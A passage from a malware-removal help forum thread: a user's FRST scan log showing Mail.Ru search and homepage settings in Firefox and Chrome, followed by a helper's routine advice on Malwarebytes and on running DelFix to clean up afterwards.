BHO: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll [2014-04-09] (McAfee, Inc.)
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2014-04-25] (Microsoft Corporation)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2014-04-08] (Microsoft Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2014-04-01] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\Profiles\ij5a11r8.default [2017-04-28]
FF NewTab: Mozilla\Firefox\Profiles\ij5a11r8.default -> about:newtab
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\ij5a11r8.default -> Поиск@Mail.Ru
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\ij5a11r8.default -> Поиск@Mail.Ru
FF Homepage: Mozilla\Firefox\Profiles\ij5a11r8.default -> hxxps://www.google.rs/
FF Keyword.URL: Mozilla\Firefox\Profiles\ij5a11r8.default -> hxxp://go.mail.ru/distib/ep/?product_id=%7B6FED2366-7EC4-400F-AC64-DB273A71E665%7D&gp=811037
FF SearchPlugin: C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\Profiles\ij5a11r8.default\searchplugins\mailru.xml [2017-04-21]
FF Extension: (Skype) - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-01-06]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_25_0_0_148.dll [2017-04-25] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2014-01-23] (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.4\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.4\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2017-03-28] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1739059202-3565848293-805263540-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\ASUS\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-05-08] (Unity Technologies ApS)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2014-01-23] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2017-03-28] (Adobe Systems Inc.)

Chrome:
=======
CHR HomePage: Default -> hxxps://mail.ru/cnt/11956636?rciguc__PARAM__
CHR StartupUrls: Default -> "hxxp://mail.ru/cnt/10445?gp=811040"
CHR NewTab: Default -> "chrome-extension://oelpkepjlgmehajehfeicfbjdiobdkfj/visual-bookmarks.html"

CHR DefaultSearchURL: Default -> hxxp://go.mail.ru/distib/ep/?q={searchTerms}&product_id=%7B43A7E749-EF1D-4494-A885-6758E5B4AA85%7D&gp=811041
CHR DefaultSearchKeyword: Default -> mail.ru
CHR DefaultSuggestURL: Default -> hxxp://suggests.go.mail.ru/ff3?q={searchTerms}
CHR Profile: C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default [2017-04-21]
CHR Extension: (Docs) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-03-07]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-03-07]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-03-07]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-03-07]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-12-04]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-07]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
S3 Disc Soft Bus Service; C:\Program Files\DAEMON Tools Ultra\DiscSoftBusService.exe [813328 2014-04-28] (Disc Soft Ltd)
R2 HWDeviceService.exe; C:\ProgramData\DatacardService\HWDeviceService.exe [276048 2013-02-06] ()
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [3303888 2017-01-20] (Malwarebytes)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [235696 2014-04-09] (McAfee, Inc.)
S2 mts mobilni internet. RunOuc; C:\Program Files\mts mobilni internet\UpdateDog\ouc.exe [656976 2013-05-21] ()
S3 Sony PC Companion; C:\Program Files\Sony\Sony PC Companion\PCCService.exe [155520 2015-06-10] (Avanquest Software)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2009-07-14] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 andnetadb; C:\Windows\System32\Drivers\lgandnetadb.sys [25856 2014-05-27] (Google Inc)
S3 AndnetBus; C:\Windows\System32\DRIVERS\lgandnetbus.sys [15744 2014-05-27] (LG Electronics Inc.)
S3 AndNetDiag; C:\Windows\System32\DRIVERS\lgandnetdiag.sys [23168 2014-05-27] (LG Electronics Inc.)
S3 ANDNetModem; C:\Windows\System32\DRIVERS\lgandnetmodem.sys [27776 2014-05-27] (LG Electronics Inc.)
S3 andnetndis; C:\Windows\System32\DRIVERS\lgandnetndis.sys [74240 2014-05-27] (LG Electronics Inc.)
R3 dtscsibus; C:\Windows\System32\DRIVERS\dtscsibus.sys [24704 2014-05-24] (Disc Soft Ltd)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae.sys [59904 2017-03-22] ()
R3 FsUsbExDisk; C:\Windows\system32\FsUsbExDisk.SYS [36608 2010-06-14] () [File not signed]
S3 ggsomc; C:\Windows\System32\DRIVERS\ggsomc.sys [26328 2015-08-24] (Sony Mobile Communications)
S3 huawei_cdcacm; C:\Windows\System32\DRIVERS\ew_jucdcacm.sys [101248 2013-03-04] (Huawei Technologies Co., Ltd.)
S3 huawei_ext_ctrl; C:\Windows\System32\DRIVERS\ew_juextctrl.sys [27776 2013-03-04] (Huawei Technologies Co., Ltd.)
S3 huawei_wwanecm; C:\Windows\System32\DRIVERS\ew_juwwanecm.sys [208384 2013-06-29] (Huawei Technologies Co., Ltd.)
R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [161216 2017-04-27] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\system32\drivers\farflt.sys [96704 2017-04-28] (Malwarebytes)
S3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [39360 2017-04-28] (Malwarebytes)
R0 MBAMSwissArmy; C:\Windows\System32\drivers\MBAMSwissArmy.sys [220088 2017-04-28] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [64288 2017-04-28] (Malwarebytes)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-28 09:25 - 2017-04-28 09:27 - 00011593 _____ C:\Users\ASUS\Desktop\FRST.txt
2017-04-27 14:00 - 2017-04-28 09:26 - 00096704 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2017-04-27 14:00 - 2017-04-28 09:26 - 00064288 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2017-04-27 14:00 - 2017-04-28 09:26 - 00039360 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2017-04-27 13:59 - 2017-04-27 13:59 - 00002020 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-04-27 13:59 - 2017-04-27 13:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-04-27 13:59 - 2017-04-27 13:59 - 00000000 ____D C:\Program Files\Malwarebytes
2017-04-27 13:59 - 2017-03-22 11:02 - 00059904 _____ C:\Windows\system32\Drivers\mbae.sys
2017-04-25 21:38 - 2017-04-25 22:01 - 00000000 ____D C:\Users\ASUS\Desktop\Warcraft.2016.720p.BluRay.x264.ShAaNiG
2017-04-25 21:27 - 2017-04-25 21:27 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2017-04-25 21:27 - 2017-04-25 21:27 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2017-04-25 20:21 - 2017-04-25 20:21 - 00000000 ____D C:\Users\ASUS\AppData\LocalLow\Oracle
2017-04-25 20:19 - 2017-04-25 20:19 - 56134208 _____ (Oracle Corporation) C:\Users\ASUS\Downloads\JavaSetup.exe
2017-04-25 19:33 - 2017-04-28 09:25 - 00000000 ____D C:\FRST
2017-04-25 19:33 - 2017-04-27 13:52 - 01768448 _____ (Farbar) C:\Users\ASUS\Desktop\FRST.exe
2017-04-21 12:05 - 2017-04-21 12:05 - 00000000 ____D C:\Users\ASUS\AppData\LocalLow\Unity
2017-04-21 12:00 - 2017-04-21 12:23 - 00000000 ____D C:\Users\ASUS\AppData\Local\Mail.Ru
2017-04-21 12:00 - 2017-04-21 12:00 - 00000000 ____D C:\ProgramData\Mail.Ru
2017-04-14 20:47 - 2017-04-14 20:55 - 00000000 ___HD C:\Users\ASUS\AppData\Local\SysHashTable
2017-04-03 20:23 - 2017-04-28 01:06 - 00000000 ____D C:\Users\ASUS\AppData\LocalLow\Mozilla
2017-04-03 20:12 - 2017-04-27 07:49 - 00000000 ____D C:\Program Files\Mozilla Firefox

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-28 09:26 - 2015-05-26 17:58 - 00220088 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-04-28 09:24 - 2009-07-14 06:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-27 23:41 - 2010-11-20 23:01 - 00778150 _____ C:\Windows\system32\PerfStringBackup.INI
2017-04-27 23:41 - 2009-07-14 04:37 - 00000000 ____D C:\Windows\inf
2017-04-27 14:00 - 2015-05-26 17:56 - 00161216 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2017-04-27 13:59 - 2015-05-26 17:58 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-04-27 13:49 - 2009-07-14 06:33 - 00434504 _____ C:\Windows\system32\FNTCACHE.DAT
2017-04-27 08:28 - 2009-07-14 04:37 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2017-04-25 21:36 - 2014-05-22 23:13 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\uTorrent
2017-04-25 21:28 - 2015-01-05 15:00 - 00000000 ____D C:\Users\ASUS\AppData\Local\Adobe
2017-04-25 21:27 - 2014-05-24 15:07 - 00000000 ____D C:\Windows\system32\Macromed
2017-04-25 20:27 - 2009-07-14 04:37 - 00000000 ____D C:\PerfLogs
2017-04-25 20:11 - 2009-07-14 06:34 - 00021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-04-25 20:11 - 2009-07-14 06:34 - 00021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-04-25 20:05 - 2014-08-12 22:39 - 00000000 ____D C:\Users\ASUS\AppData\Local\ElevatedDiagnostics
2017-04-21 12:26 - 2015-03-07 21:23 - 00000000 ____D C:\Program Files\Google
2017-04-21 11:52 - 2015-12-24 11:42 - 00001105 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-21 11:52 - 2014-05-22 21:42 - 00001117 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-21 11:35 - 2014-06-29 13:07 - 00000000 ____D C:\Windows\Minidump
2017-04-21 11:35 - 2014-05-24 16:10 - 00000000 ____D C:\Program Files\CCleaner
2017-04-15 14:18 - 2015-01-07 13:42 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2017-04-08 20:45 - 2015-03-07 21:24 - 00002143 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

==================== Files in the root of some directories =======

2016-02-03 10:16 - 2016-02-03 10:16 - 0963707 _____ () C:\Users\ASUS\AppData\Local\MP4-Player_242.rar
2015-01-13 14:01 - 2015-01-13 14:01 - 0001025 _____ () C:\Users\ASUS\AppData\Local\recently-used.xbel

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => MD5 is legit
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-02-14 21:59

==================== End of FRST.txt ============================

offline
  • Joined: 26 Aug 2010
  • Posts: 10621
  • Location: Hypnos Control Room, Tokyo Metropolitan Government Building

Follow these instructions to deactivate the trial version of MBAM and convert it to the Free version, which has no real-time protection.

https://support.malwarebytes.com/customer/en/porta.....ebytes-3-0

Let me know how things are after that.

offline
  • Joined: 26 Mar 2011
  • Posts: 221

I think things are a little better. Is there anything else I should do... or should I just keep an eye on it? Should I delete FRST now... install some protection program, delete this Malwarebytes... in any case, I will follow any further instructions.

offline
  • Joined: 26 Aug 2010
  • Posts: 10621
  • Location: Hypnos Control Room, Tokyo Metropolitan Government Building

You have a very slow processor, so any AV would slow it down a lot. Try reinstalling MBAM and see how things are then. My recommendation is to scan the computer with MBAM from time to time.


The following procedure performs the final cleanup.

Download "Xplode"'s DelFix tool and save it to the Desktop.
Double-click the tool to run it and tick the boxes in front of the following options:

Remove disinfection tools
Create registry backup
Purge System Restore


Click the Run button and wait a moment until the tool finishes its work.
From this point on, all the tools used in this thread should be deleted.
The tool will also produce a report for you. (C:\DelFix.txt)

The tool will also save the healthy state of the registry and make a backup using the integrated program "ERUNT" in %windir%\ERUNT\DelFix
The tool deletes the old System Restore points and creates a new, fresh point after the cleanup.
